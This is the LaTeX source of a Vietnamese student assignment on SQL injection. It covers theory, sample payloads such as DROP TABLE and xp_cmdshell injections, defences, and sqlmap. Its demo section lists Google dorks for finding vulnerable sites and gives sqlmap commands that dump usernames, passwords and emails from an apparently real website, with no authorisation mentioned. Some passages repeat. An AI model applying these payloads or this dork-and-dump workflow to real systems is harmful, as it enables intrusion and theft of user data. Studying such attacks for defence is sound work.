\documentclass[12pt]{article}
\usepackage[english]{babel}
\usepackage[utf8]{inputenc}
\usepackage{vntex}
\usepackage{amsmath}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage{graphicx}
\usepackage{subcaption}
\usepackage{xcolor}
          
%\setlength{\parindent}{0pt}%ngan thu vao dau dong 
\begin{document}    
\begin{titlepage}
\newcommand{\HRule}{\rule{\linewidth}{0.5mm}}

\center
\textsc{\LARGE đại học bách khoa}\\[0.2cm]
\textsc{\Large khoa khoa học và kỹ thuật máy tính} \\[0.2cm]
\textsc{\large MẬT MÃ VÀ AN NINH MẠNG}\\[0.5cm]
    
\HRule \\[0.4cm]
{ \huge \bfseries ASSIGNMENT 2} \\[0.4cm]
{\LARGE Tìm Hiểu Về SQL Injection}
\HRule \\[1cm]


\includegraphics[width = 4cm,height = 4cm]{logo.png}\\[1cm]
{\large \today}\\[1cm]
\begin{minipage}{0.4\textwidth}
       \begin{flushleft}
        \emph{Giáo viên hướng dẫn:}\\
        Nguyễn Hữu Hiếu
       \end{flushleft}
\end{minipage}
~
\begin{minipage}{0.4\textwidth}
    \begin{flushright}
        \emph{Sinh viên:}\\
        %\rowcolors{1}{green}{pink}
        \begin{tabular}{l|r}
            Họ và tên & MSSV\\
               \hline
            Nguyễn Trọng Tín & 1513495\\
           	Dương Thanh Nam & 1512058\\
           	Đỗ Thành Long & 1511799\\
           \end{tabular}
       \end{flushright}    
\end{minipage}
\vfill
\end{titlepage}
\pagebreak
  
%tao muc luc
\tableofcontents
\pagebreak
\listoffigures
\vfill
\pagebreak
    

%noi dung chinh bai bao cao

%\begin{abstract}
%    SQL Injection là một lỗi
%\end{abstract}

\section{Tóm Tắt}
\begin{itemize}
	\item Công cụ thực hiên:Kali linux, sqlmap
	\item Bố cuc bài báo cáo gồm hai phần chính:
	\begin{itemize}
		\item Nội dung về cơ sở lý thuyết
		\item Thực hiện demo cơ bản
	\end{itemize}
\end{itemize} 
\section{Cơ sở lý thuyết}
\subsection{Giới thiệu về SQL injection}

Đa số ứng dụng web ngày này đều quản lý và đáp ứng các yêu cầu truy xuất dữ liệu
thông qua ngôn ngữ truy vấn cấu trúc SQL. Các hệ quản trị cơ sở dữ liệu thông dụng
như Oracle, MS SQL hay MySQL đều có chung một đặc điểm này, chính vì vậy những
dạng tấn công liên quan đến SQL thường được xếp hàng đầu trong danh sách các lỗ hổng
nguy hiểm nhất, và dạng tấn công vào những lỗi này gọi là SQL injection.
\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{sqli.png}
    \caption{SQL Most Revalent Vulnerability 2015}
\end{figure}


Các tấn công dạng này của hacker thường đánh vào các trang web chứa
thông tin tài khoản quan trọng của người dùng
kết quả thu được có giá trị kinh tế cao, và khả năng thành công lớn, dễ tiến hành là những
đặc điểm khiến cho SQL injection được xếp hàng số 1 trong danh sách những lỗi bị ảnh
hưởng nhiều nhất trong năm 2015 như Hình 1

SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của
việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ
quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất
hợp pháp.


SQL injection thực hiện một cuộc tấn công cơ bản được sử dụng để truy cập trái phép vào cơ sở dữ liệu hoặc truy xuất thông tin trực tiếp từ cơ sở dữ liệu.


Nó là lỗ hổng của web application không phải vấn đề của database hay của web server.

\pagebreak
Dựa trên cơ sở của ứng dụng đã sử dụng và cách thức xử lý dữ liệu do người dùng cung cấp, 
SQL injection có thể được sử dụng để thực hiện các cuộc tấn công như sau:
\begin{itemize}
    \item \emph{Authentication Bypass:} kẻ tấn công đăng nhập vào một ứng dụng mà không cung cấp tên người dùng và mật khẩu hợp lệ và có quyền administrative.
    \item \emph{Information Disclosure:} sử dụng tấn công này kẻ tấn công có được thông tin nhạy cảm được lưu trữ trong cơ sở dữ liệu.
    \item \emph{Compromised Data Integrity:}  một kẻ tấn công người dùng tấn công này để thay đổi một trang web bằng cách chèn nội dung độc hại vào các trang web hoặc sau đó nội dung của một cơ sở dữ liệu.
    \item  \emph{Compromised Availability of Data:} Kẻ tấn công sử dụng tấn công này để xóa thông tin cơ sở dữ liệu, xóa nhật ký hoặc thông tin kiểm tra được lưu trữ trong cơ sở dữ liệu
    \item \emph{Remote Code Execution:} nó giúp kẻ tấn công  gây nguy hại cho host OS.    
\end{itemize}


\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{webapp.png}
    \caption{How web application work}
\end{figure}
\subsection{Các lỗi thường gặp}
\subsubsection{Không kiểm tra ký tự thoát truy vấn}
Đây là dạng lỗi SQL injection xảy ra khi thiếu đoạn mã kiểm tra dữ liệu đầu vào trong
câu truy vấn SQL. Kết quả là người dùng cuối có thể thực hiện một số truy vấn không
mong muốn đối với cơ sở dữ liệu của ứng dụng. Dòng mã sau sẽ minh họa lỗi này:
\begin{verbatim}
	statement = "SELECT * FROM users WHERE name = '" + userName + "';"
\end{verbatim}
Câu lệnh này được thiết kế để trả về các bản ghi tên người dùng cụ thể từ bảng những
người dùng. Tuy nhiên, nếu biến "userName" được nhập chính xác theo một cách nào đó
bởi người dùng ác ý, nó có thể trở thành một câu truy vấn SQL với mục đích khác hẳn so
với mong muốn của tác giả đoạn mã trên. Ví dụ, ta nhập vào giá trị của biến userName
như sau:
\begin{verbatim}
a' or 't'='t
\end{verbatim}
Khiến câu truy vấn có thể được hiểu như sau:

\begin{verbatim}
SELECT * FROM users WHERE name = 'a' OR 't'='t';
\end{verbatim}
Nếu đoạn mã trên được sử dụng trong một thủ tục xác thực thì ví dụ trên có thể được sử
dụng để bắt buộc lựa chọn một tên người dùng hợp lệ bởi 't'='t' luôn đúng. Trong khi hầu
hết các SQL server cho phép thực hiện nhiều truy vấn cùng lúc chỉ với một lần gọi, tuy
nhiên một số SQL API như mysql\_query của php lại không cho phép điều đó vì lý do bảo
mật. Điều này chỉ ngăn cản tin tặc tấn công bằng cách sử dụng các câu lệnh riêng rẽ mà
không ngăn cản tin tặc thay đổi các từ trong cú pháp truy vấn. Các giá trị của biến
"userName" trong câu truy vấn dưới đây sẽ gây ra việc xoá những người dùng từ bảng
người dùng cũng tương tự như việc xóa tất cả các dữ liệu được từ bảng dữ liệu (về bản
chất là tiết lộ các thông tin của mọi người dùng), ví dụ này minh họa bằng một API cho
phéo thực hiện nhiều truy vấn cùng lúc:
\begin{verbatim}
a';DROP TABLE users; SELECT * FROM data WHERE 't' = 't
\end{verbatim}
Khiến câu truy vấn có thể được hiểu như sau:
\begin{verbatim}
SELECT * FROM users WHERE name = 'a' OR 't'='t';
\end{verbatim}
Nếu đoạn mã trên được sử dụng trong một thủ tục xác thực thì ví dụ trên có thể được sử
dụng để bắt buộc lựa chọn một tên người dùng hợp lệ bởi 't'='t' luôn đúng. Trong khi hầu
hết các SQL server cho phép thực hiện nhiều truy vấn cùng lúc chỉ với một lần gọi, tuy
nhiên một số SQL API như mysql\_query của php lại không cho phép điều đó vì lý do bảo
mật. Điều này chỉ ngăn cản tin tặc tấn công bằng cách sử dụng các câu lệnh riêng rẽ mà
không ngăn cản tin tặc thay đổi các từ trong cú pháp truy vấn. Các giá trị của biến
"userName" trong câu truy vấn dưới đây sẽ gây ra việc xoá những người dùng từ bảng
người dùng cũng tương tự như việc xóa tất cả các dữ liệu được từ bảng dữ liệu (về bản
chất là tiết lộ các thông tin của mọi người dùng), ví dụ này minh họa bằng một API cho
phéo thực hiện nhiều truy vấn cùng lúc:
\begin{verbatim}
a';DROP TABLE users; SELECT * FROM data WHERE 't' = 't
\end{verbatim}
Điều này đưa tới cú pháp cuối cùng của câu truy vấn trên như sau:
\begin{verbatim}
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM
DATA WHERE 't' = 't';
\end{verbatim}
\subsubsection{Xử lý không đúng kiểu}
Lỗi SQL injection dạng này thường xảy ra do lập trình viên hay người dùng định nghĩa
đầu vào dữ liệu không rõ ràng hoặc thiếu bước kiểm tra và lọc kiểu dữ liệu đầu vào. Điều5
này có thể xảy ra khi một trường số được sử dụng trong truy vấn SQL nhưng lập trình
viên lại thiếu bước kiểm tra dữ liệu đầu vào để xác minh kiểu của dữ liệu mà người dùng
nhập vào có phải là số hay không. Ví dụ như sau:
\begin{verbatim}
statement := "SELECT * FROM data WHERE id = " + a_variable + ";"
\end{verbatim}
Ta có thể nhận thấy một cách rõ ràng ý định của tác giả đoạn mã trên là nhập vào một số
tương ứng với trường id - trường số. Tuy nhiên, người dùng cuối, thay vì nhập vào một
số, họ có thể nhập vào một chuỗi ký tự, và do vậy có thể trở thành một câu truy vấn SQL
hoàn chỉnh mới mà bỏ qua ký tự thoát. Ví dụ, ta thiết lập giá trị của biến a\_variable là:
\begin{verbatim}
1;DROP TABLE users
\end{verbatim}
khi đó, nó sẽ thực hiện thao tác xóa người dùng có id tương ứng khỏi cơ sở dữ liệu, vì
câu truy vấn hoàn chỉnh đã được hiểu là:
\begin{verbatim}
SELECT * FROM DATA WHERE id=1;DROP TABLE users;
\end{verbatim}
\subsubsection{Blind SQL injection}
SQL injection dạng này là dạng lỗi tồn tại ngay trong ứng dụng web nhưng hậu quả của
chúng lại không hiển thị trực quan cho những kẻ tấn công. Nó có thể gây ra sự sai khác
khi hiển thị nội dung của một trang chứa lỗi bảo mật này, hậu quả của sự tấn công SQL
injection dạng này khiến cho lập trình viên hay người dùng phải mất rất nhiều thời gian
để phục hồi chính xác từng bit dữ liệu. Những kẻ tấn công còn có thể sử dụng một số
công cụ để dò tìm lỗi dạng này và tấn công với những thông tin đã được thiết lập sẵn.
\subsection{Một số dạng tấn công bằng SQL injection thường gặp}
Có bốn dạng tấn công bao gồm: vượt qua kiểm tra lúc đăng nhập, sử dụng câu lệnh SELECT, sử dụng câu lệnh INSERT, sử dụng các stored-procedures.
\subsubsection{Vượt qua đăng nhập}
Với dạng tấn công này, tin tặc có thể dễ dàng vượt qua các trang đăng nhập nhờ vào lỗi
khi dùng các câu lệnh SQL thao tác trên cơ sở dữ liệu của ứng dụng web. Thông thường
để cho phép người dùng truy cập vào các trang web được bảo mật, hệ thống thường xây
dựng trang đăng nhập để yêu cầu người dùng nhập thông tin về tên đăng nhập và mật
khẩu. Sau khi người dùng nhập thông tin vào, hệ thống sẽ kiểm tra tên đăng nhập và mật
khẩu có hợp lệ hay không để quyết định cho phép hay từ chối thực hiện tiếp.
\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{http.png}
    \caption{Understading HTTP Post and Request}
\end{figure}
\pagebreak
\subsubsection{Sử dụng câu lệnh SELECT}
Để thực hiện được kiểu tấn công này, kẻ tấn công phải
có khả năng hiểu và lợi dụng các sơ hở trong các thông báo lỗi từ hệ thống để dò tìm các
điểm yếu khởi đầu cho việc tấn công. Ví dụ, trong các trang tìm kiếm. Các trang này cho
phép người dùng nhập vào các thông tin tìm kiếm như Họ, Tên, … Đoạn mã thường gặp
là:
\begin{verbatim}
    <%
    Dim vAuthorName, objRS, strSQL
    vAuthorName = Request("fAUTHOR_NAME")
    strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _
vAuthorName & " ' "
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    …
    Set objRS = Nothing %>
\end{verbatim}

Tương tự như trên, tin tặc có thể lợi dụng sơ hở trong câu truy vấn SQL để nhập vào
trường tên tác giả bằng chuỗi giá trị:
\begin{verbatim}
    ' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '=' (*)
\end{verbatim}
Lúc này, ngoài câu truy vấn đầu không thành công, chương trình sẽ thực hiện thêm lệnh
tiếp theo sau từ khóa UNION nữa. Giả sử đoạn mã nhập vào là:
\begin{verbatim}
    ' DROP TABLE T_AUTHORS --
\end{verbatim}
Câu truy vấn sẽ thực hiện việc xóa bảng.
\subsubsection{sử dụng câu lệnh INSERT}
Các ứng dụng web cho phép người dùng đăng kí một tài khoản. Chức năng không thể thiếu là sau khi đăng kí thành công, người dùng có thể xem và
hiệu chỉnh thông tin của mình. SQL injection có thể được dùng khi hệ thống không kiểm
tra tính hợp lệ của thông tin nhập vào. Ví dụ, một câu lệnh INSERT có thể có cú pháp
dạng:
\begin{verbatim}
    INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three')
\end{verbatim}
Nếu đoạn mã xây dựng câu lệnh SQL có dạng :
\begin{verbatim}
    <%
    strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' "
    _ & strValueTwo & " ', ' " & strValueThree & " ') "
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    …
    Set objRS = Nothing %>
\end{verbatim}
Thì chắc chắn sẽ bị lỗi SQLi, bởi vì nếu ta nhập vào trường thứ nhất ví dụ như:

\begin{verbatim}
    ' + (SELECT TOP 1 FieldName FROM TableName) + '
\end{verbatim}
Lúc này câu truy vấn sẽ là :
\begin{verbatim}
    INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM
    TableName) + ' ', 'abc', 'def') '
\end{verbatim}
Khi đó, lúc thực hiện lệnh xem thông tin, xem như bạn đã yêu cầu thực hiện thêm một lệnh nữa đó là:
\begin{verbatim}
    SELECT TOP 1 FieldName FROM TableName
\end{verbatim}
\subsubsection{Sử dụng các stored-procedures}
Việc tấn công bằng stored-procedures sẽ gây tác hại rất lớn nếu ứng dụng được thực thi
với quyền quản trị hệ thống 'sa'. Ví dụnếu ta thay đoạn mã tiêm vào dạng: 'EXEC
xp\_cmdshell 'cmdd.exe dir C:'. Lúc này hệ thống sẽ thực hiện lệnh liệt kê thư mục trên ổ
đĩa C: cài đặt server. Việc phá hoại kiểu nào tuỳ thuộc vào câu lệnh đằng sau cmd.exe.fg
\subsubsection{Các bước cơ bản để tấn công bằng SQL inject}
\begin{enumerate}
    \item  Sư dụng trình duyệt tìm kiếm các trang đăng nhập của web site hay những trang
    tiếp nhận dữ liệu đầu vào như các form khai báo mất và phục hồi mật khẩu. Kiểm
    tra các trang hiển thị lệnh POST hay GET bằng cách tìm kiếm trong source code
    \item Tiếp theo, kiểm tra máy chủ SQL bằng các truy vấn dùng cặp dấu nháy đơn ('')
    nếu máy chủ đáp ứng bằng các thông điệp như use 'a'='a' hay tương tự như vậy
    thì các hacker có thể đáon được máy chủ có khả năng bị tấn công theo dạng SQL
    injection. Ngoài ra, các dữ liệu thường dùng cho quá trình kiểm tra lỗi khác như '
    or $1=1–$ hay " or $1=1–$
    \item Khi phát hiện thấy máy chủ hay trang web bị lỗi hacker sẽ dùng các lệnh
    SELECT để lấy dữ liệu từ máy chủ hay lệnh INSERT đển chèn thông tin vào cơ
    sở dữ liệu.
\end{enumerate}
Sau đây là danh sách các công cụ chuên dùng để tấn công SQL injection hiện nay :
\begin{figure}[h!]
    \centering
    \includegraphics{sqlit.png}
    \caption{SQL injection tools}
\end{figure}
\subsection{Cách phòng chống}
Để phòng chống tấn công SQL Injection trước hết chúng ta cần gán quyền thích hợp
cho người dùng khi kết nối đến cơ sở dữ liệu và áp dụng mật khẩu mạnh cho tài
khoản SA hay tài khoản quản trị. Các hacker thường chẩn đoán lỗi dựa trên các thông
báo trả về, do đó việc hạn chế các thông báo này cũng giúp tăng cường an ninh cho
website hay máy chủ web và giảm thiểu rũi ro bị tấn công SQL injection.\\
Ngoài ra, các kí tự mà hacker nhập vào để gởi đến máy chủ thường có các kí tự đặc
biệt như dấu nháy đơn (‘ ’) nên các bạn cần kiểm tra chặt chẽ các dữ liệu nhập vào
của người dùng trong mã nguồn, từ chối các truy vấn khả nghi hay cài đặt các
module, plug-in hỗ trợ phòng chống SQL Injection.\\

Bên cạnh đó, các máy chủ cơ sở dữ liệu cần được cập nhật và vá lỗi đầy đủ, nên đặt
sau hệ thống tường lữa để tránh sự tương tác trực tiếp, điều này sẽ giúp tăng cường
bảo mật.Trên hệ thống cần có thêm các dịch vụ hay thiết bị dò tìm xâm phạm trai
phép (IDS/IPS) như SNORT, Cisco IDS …
\subsection{Giới thiệu về sqlmap}
\subsubsection{Giới thiệu}
sqlmap là một công cụ kiểm tra thâm nhập nguồn mở tự động 
hóa quá trình phát hiện và khai thác lỗ hổng SQL injection 
và chiếm đoạt các máy chủ cơ sở dữ liệu. Nó đi kèm với một 
công cụ phát hiện mạnh mẽ, nhiều tính năng thích hợp cho 
trình kiểm tra xâm nhập cuối cùng và một loạt các thiết bị chuyển mạch kéo dài từ việc lấy dấu vân tay cơ sở dữ liệu,  truy xuất dữ liệu từ cơ sở dữ liệu, truy cập hệ thống tệp cơ bản và thực hiện các lệnh trên hệ điều hành thông qua các kết  nối ngoài băng tần.


\subsubsection{Tính năng}
\begin{itemize}
     \item Hỗ trợ cho đầy đủ cho các hệ thống quản trị cơ sở dữ liệu: MySQL, Oracle, PostgreSQL, 
     Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB và Informix.
     \item Hỗ trợ đầy đủ cho sáu kỹ thuật SQL Injection: boolean-based blind, time-based blind, error-based, 
     UNION query-based, stacked queries and out-of-band
     \item Hỗ trợ kết nối trực tiếp tới cơ sở dữ liệu mà không cần truyền qua SQL injection, 
     bằng cách cung cấp thông tin đăng nhập DBMS, địa chỉ IP, cổng và tên cơ sở dữ liệu.
     \item Hỗ trợ liệt kê người dùng, hàm băm mật khẩu, quyền, luật, cơ sở dữ liệu, bảng và cột
     \item Tự động nhận dạng các định dạng băm mật khẩu và hỗ trợ cho việc bẻ khóa chúng bằng cách sử dụng tấn công dựa trên từ điển.
     \item Hỗ trợ kết xuất các bảng cơ sở dữ liệu hoàn toàn, một loạt các mục hoặc các cột cụ thể theo sự lựa chọn của người dùng. Người dùng cũng có thể chọn chỉ kết xuất một loạt các ký tự từ mục nhập của mỗi cột.
     \item Hỗ trợ tìm kiếm các tên cơ sở dữ liệu cụ thể, 
     các bảng cụ thể trên tất cả các cơ sở dữ liệu hoặc các cột cụ thể trên tất cả các bảng của cơ sở dữ liệu. 
     Điều này rất hữu ích, ví dụ, để xác định các bảng có chứa thông tin đăng nhập ứng dụng tùy chỉnh, 
     trong đó các tên của các cột có liên quan chứa chuỗi như tên và mật khẩu.
     \item  Hỗ trợ tải xuống và tải lên bất kỳ tệp nào từ hệ thống tệp cơ sở dữ liệu máy chủ cơ sở dữ liệu khi phần mềm cơ sở dữ liệu là MySQL, PostgreSQL hoặc Microsoft SQL Server.
     \item Hỗ trợ thực hiện các lệnh tùy ý và truy xuất đầu ra tiêu chuẩn của chúng trên máy chủ cơ sở dữ liệu bên dưới hệ điều hành khi phần mềm cơ sở dữ liệu là MySQL, PostgreSQL hoặc Microsoft SQL Server.
     \item Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server
      underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
     \item Hỗ trợ thiết lập kết nối TCP trạng thái ngoài băng tần giữa máy tấn công và máy chủ cơ sở dữ 
     liệu nằm bên dưới hệ điều hành. Kênh này có thể là một dấu nhắc lệnh tương tác, một phiên Meterpreter 
     hoặc một phiên giao diện người dùng đồ họa (VNC) theo sự lựa chọn của người dùng.
     \item Hỗ trợ quá trình leo thang quyền của người sử dụng cơ sở dữ liệu thông qua lệnh systempreter của Metasploit.

\end{itemize}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\section{Demo cơ bản về lỗi SQL Injection}

\subsection{Tìm một trang web có thể bị tấn công bởi kỹ thuật này.}
Đây là bước lâu nhất trong tất cả các bước. Đầu tiên là tìm trang web có thể bị tấn công trên google. 
Sau đó là kiểm tra xem đó có phải đúng là trang web bị SQL injection không.
Dưới đây là danh sách dài, nó có thể chiếm nhiều thời gian của bạn. \\
 \begin{tabular}{|l |l |l|}
     Google Dork string Column 1	&	Google Dork string Column 2	&	Google Dork string Column 3	\\\hline
     inurl:item\_id=	&	inurl:review.php?id=	&	inurl:hosting\_info.php?id=	\\
     inurl:newsid=	&	inurl:iniziativa.php?in=	&	inurl:gallery.php?id=	\\
     inurl:trainers.php?id=	&	inurl:curriculum.php?id=	&	inurl:rub.php?idr=	\\
     inurl:news-full.php?id=	&	inurl:labels.php?id=	&	inurl:view\_faq.php?id=	\\
     inurl:news\_display.php?getid=	&	inurl:story.php?id=	&	inurl:artikelinfo.php?id=	\\
     inurl:index2.php?option=	&	inurl:look.php?ID=	&	inurl:detail.php?ID=	\\
     inurl:readnews.php?id=	&	inurl:newsone.php?id=	&	inurl:index.php?=	\\
     inurl:top10.php?cat=	&	inurl:aboutbook.php?id=	&	inurl:profile\_view.php?id=	\\
     inurl:newsone.php?id=	&	inurl:material.php?id=	&	inurl:category.php?id=	\\
     inurl:event.php?id=	&	inurl:opinions.php?id=	&	inurl:publications.php?id=	\\
     inurl:product-item.php?id=	&	inurl:announce.php?id=	&	inurl:fellows.php?id=	\\
     inurl:sql.php?id=	&	inurl:rub.php?idr=	&	inurl:downloads\_info.php?id=	\\
     inurl:index.php?catid=	&	inurl:galeri\_info.php?l=	&	inurl:prod\_info.php?id=	\\
    inurl:news.php?catid=	&	inurl:tekst.php?idt=	&	inurl:shop.php?do=part\&id=	\\
     inurl:index.php?id=	&	inurl:newscat.php?id=	&	inurl:productinfo.php?id=	\\
     inurl:news.php?id=	&	inurl:newsticker\_info.php?idn=	&	inurl:collectionitem.php?id=	\\
     ...                &  .....                    & ......... \\

\end{tabular}
\\
Kiểm tra xem trang web đó có bị SQL injection không.\\
Sau khi google tất cả các từ khoa bên trên. Bạn sẽ có một danh sách các website trả về. Vậy làm sao để biết trang web nào bị SQL injection? 
Dưới đây chúng tôi sẽ chỉ bạn cách kiểm tra chúng:\\

\begin{itemize}
    \item Giả sử trang web bạn search có địa chỉ như sau: $http://ssy.org/detail.php?id=1$
    \item Thêm vào dấu nháy đơn vào cuối đoạn URL. Đoạn URL của bạn sẽ trông như thế này: $http://ssy.org/detail.php?id=1'$. Sau đó nhấn ENTER.
    \item Nếu trang web trả về lỗi SQL, thì chúc mừng bạn. Đó là trang web bạn cần tìm
\end{itemize}
\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{url.png}
    \caption{Lỗi trả về}
\end{figure}


\newpage
Dưới đây là một số mẫu SQLi của một số database và ngôn ngữ:

\textbf{Microsoft SQL Server}\\
Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: $System.Data.SqlClient.SqlException:$ Unclosed quotation mark before the character string 'attack;'.\\

\textbf{MySQL Errors}\\
Warning: mysql\_fetch\_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12\\

\textbf{Oracle Errors}\\
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated\\

\textbf{PostgreSQL Errors}\\
Query failed: ERROR: unterminated quoted string at or near """"""\\

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\subsection{Xuất các database có trong trang web.}
Sau khi chúng ta đã có trang web bị lỗi SQLi thì chúng ta sẽ tiến hành xuất tất cả tên database có trong trang web ra bằng cách dùng câu lệnh sau: 
\emph{Command line: sqlmap -u http://ssy.org/detail.php?id=1 –dbs}\\
Trong đó:\\
sqlmap: tên của file nhị phân sqlmap\\ 
-u: là địa chỉ url\\
--dbs: dùng để xuất tất cả tên database ra.\\ 

\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{mh.png}
    \caption{Ảnh minh họa}
\end{figure}
\pagebreak
\subsection{Xuất tên tất cả các bảng có trong database}
\emph{Command line: sqlmap -u http://ssy.org/detail.php?id=1 –D joshient\_datassy –tables}

\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{mh2.png}
    \caption{Ảnh minh họa 2}
\end{figure}

\subsection{Xuất tất cả các cột có trong bảng.}
\emph{Command line:sqlmap -u http://ssy.org/detail.php?id=1 –D joshient\_datassy –T users –columns}
\begin{figure}[h!]
    \centering
    \includegraphics[width=1\linewidth]{mh3.png}
    \caption{Ảnh minh họa 3}
\end{figure}
\subsection{Xuất các trường dữ liệu trong bảng ra.}
\emph{
Command line:
sqlmap -u http://ssy.org/detail.php?id=1 –D joshient\_datassy –T users –C name,password,id,email –dump}
\begin{figure}[h!]
    \centering

    \includegraphics[width=1\linewidth]{mh4.png}
    \caption{Ảnh minh họa 4 }
\end{figure}
\section{Phân tích và kết luận}
Lỗi SQL Injection là lỗi đã có từ lâu nên hiện nay chỉ còn mang tính chất giáo dục. 
\begin{itemize}
	
	\item Tất cả các API hiện tại đều đã có cơ chế để sử lý lỗ hổng này.
	\item Đây là lỗ hổng tồn tại ở ứng dụng nên lập trình viên có thể tránh lỗi này bằng cách quan tâm đến input của người dùng.
\end{itemize}


\section{Hướng phát triển}
\begin{itemize}
	\item Tìm hiểu thêm các kỹ thuật tấn công mạng
	\item Tiếp tục nghiên cứu và tìm ra các biện pháp hữu hiệu để phòng chống các cuộc tấn công mạng
\end{itemize}
\section{Tham khảo}
\begin{enumerate}
    \item \emph{https://en.wikipedia.org/wiki/SQL\_injection, truy cập ngày 22/5/2018}
    \item \emph{http://sqlmap.org/, truy cập ngày 22/5/2018}
    
	\item \emph{https://www.kali.org/kali-linux-documentation/, truy cập ngày 22/5/2018}
	\item \emph{https://www.youtube.com/watch?v=FVmWMogGX4Q, truy cập ngày 22/5/2018}
\end{enumerate}

\section{phụ lục 1:}
\begin{tabular}{|c|c|c|}
	\hline 
	 Họ và Tên & công việc &hoàn thành\\ 
	\hline 
	 Nguyễn Trọng Tín & Tìm hiểu demo, tìm tài liệu cơ sở lý thuyết cho báo cáo &90\%\\ 
	\hline 
	 Dương Thanh Nam & Viết Báo Cáo, tìm hiểu tài liệu cơ sở lý thuyết &90\%\\ 
	\hline 
	 Đỗ Thành Long & Viết Báo Cáo, tìm hiểu demo &90\%\\ 
	\hline 
\end{tabular} 
\end{document}